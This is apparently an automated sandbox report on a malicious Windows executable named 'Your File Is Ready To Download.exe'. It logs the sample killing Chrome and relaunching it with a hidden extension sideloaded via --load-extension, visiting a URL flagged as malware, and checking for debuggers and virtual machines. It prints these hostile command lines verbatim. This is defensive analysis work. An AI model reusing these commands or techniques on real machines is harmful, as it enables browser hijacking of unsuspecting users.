Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Your File Is Ready To Download.exe

Overview

General Information

Sample name:Your File Is Ready To Download.exe
Analysis ID:1583876
MD5:c350eacfe1e1e28295eb961af91e70f8
SHA1:bca71c098aadb35a4e94f1f68d239eab1d11f52a
SHA256:0b0dbc8833cc08b6d44607278f7945b015c23dcfd2531cd5fe38b5dc65d28f5b
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Modifies Chrome's extension installation force list
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Installs a Chrome extension
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w11x64_office
  • Your File Is Ready To Download.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: C350EACFE1E1E28295EB961AF91E70F8)
    • chrome.exe (PID: 3356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php MD5: 290DF23002E9B52249B5549F0C668A86)
      • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)
    • taskkill.exe (PID: 7728 cmdline: /IM chrome.exe MD5: 0696086690D7B673C64A7CAD8CD58F7D)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
    • chrome.exe (PID: 8528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble MD5: 290DF23002E9B52249B5549F0C668A86)
      • chrome.exe (PID: 8720 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)
    • taskkill.exe (PID: 8084 cmdline: /F /IM chrome.exe /T MD5: 0696086690D7B673C64A7CAD8CD58F7D)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Your File Is Ready To Download.exe", ParentImage: C:\Users\user\Desktop\Your File Is Ready To Download.exe, ParentProcessId: 8136, ParentProcessName: Your File Is Ready To Download.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble, ProcessId: 8528, ProcessName: chrome.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://getfiles.wiki/welcome.php%sAvira URL Cloud: Label: malware
Source: https://getfiles.wiki/welcome.phpAvira URL Cloud: Label: malware
Source: Your File Is Ready To Download.exeReversingLabs: Detection: 70%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
Source: Your File Is Ready To Download.exeJoe Sandbox ML: detected
Source: Your File Is Ready To Download.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Your File Is Ready To Download.exeStatic PE information: certificate valid
Source: Your File Is Ready To Download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911780 SHGetKnownFolderPath,SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,Sleep,ShellExecuteW,GetFileAttributesW,Sleep,Sleep,Sleep,0_2_00911780
Source: chrome.exeMemory has grown: Private usage: 6MB later: 34MB
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: getfiles.wiki
Source: Your File Is Ready To Download.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Your File Is Ready To Download.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Your File Is Ready To Download.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Your File Is Ready To Download.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Your File Is Ready To Download.exe, Your File Is Ready To Download.exe, 00000000.00000002.11892532407.0000000000984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php
Source: Your File Is Ready To Download.exe, 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://getfiles.wiki/welcome.php%s
Source: Your File Is Ready To Download.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54545
Source: unknownNetwork traffic detected: HTTP traffic on port 54545 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54544 -> 443
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00917BA30_2_00917BA3
Source: Your File Is Ready To Download.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Your File Is Ready To Download.exe, 00000000.00000002.11892532407.00000000009CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBp
Source: classification engineClassification label: mal68.phis.winEXE@33/4@2/1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: C:\Users\user\AppData\Local\ServiceAppJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: path0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: version0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: open0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: Default0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: %s\chrome.crx0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: path0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: 1.00_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: version0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: path0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: 1.00_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: version0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCommand line argument: open0_2_00911780
Source: Your File Is Ready To Download.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Your File Is Ready To Download.exeReversingLabs: Detection: 70%
Source: Your File Is Ready To Download.exeString found in binary or memory: %s\ServiceApp\apps-helper\manifest.json
Source: Your File Is Ready To Download.exeString found in binary or memory: %s\ServiceApp\apps-helper\chrome.crx
Source: Your File Is Ready To Download.exeString found in binary or memory: --profile-directory="%s" --no-startup-window --load-extension="%s" --hide-crash-restore-bubble
Source: Your File Is Ready To Download.exeString found in binary or memory: %s\ServiceApp\apps-helper
Source: Your File Is Ready To Download.exeString found in binary or memory: %s\ServiceApp\apps-helper\service.js
Source: Your File Is Ready To Download.exeString found in binary or memory: %s\ServiceApp\apps-helper\web.js
Source: unknownProcess created: C:\Users\user\Desktop\Your File Is Ready To Download.exe "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exe
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.phpJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /IM chrome.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\SysWOW64\taskkill.exe /F /IM chrome.exe /TJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: cfgmgr32.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: virtdisk.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: Your File Is Ready To Download.exeStatic PE information: certificate valid
Source: Your File Is Ready To Download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Your File Is Ready To Download.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Your File Is Ready To Download.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Your File Is Ready To Download.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Your File Is Ready To Download.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Your File Is Ready To Download.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911050 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,0_2_00911050
Source: Your File Is Ready To Download.exeStatic PE information: real checksum: 0x3b2b2 should be: 0x35956
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00914921 push ecx; ret 0_2_00914934
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911050 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,0_2_00911050
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\TIP\AggregateResults dataJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-8907
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911780 SHGetKnownFolderPath,SHGetSpecialFolderPathW,GetFileAttributesW,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegDeleteKeyW,RegCloseKey,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,RegOpenKeyExW,RegDeleteKeyW,RegCloseKey,ShellExecuteW,Sleep,FindFirstFileW,GetFileAttributesW,GetFileAttributesW,FindNextFileW,Sleep,ShellExecuteW,GetFileAttributesW,Sleep,Sleep,Sleep,0_2_00911780
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_0091213C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0091213C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00911050 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,0_2_00911050
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00919C92 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00919C92
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_0091365F SetUnhandledExceptionFilter,0_2_0091365F
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_0091213C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0091213C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 0_2_00912775 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00912775
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.phpJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubbleJump to behavior
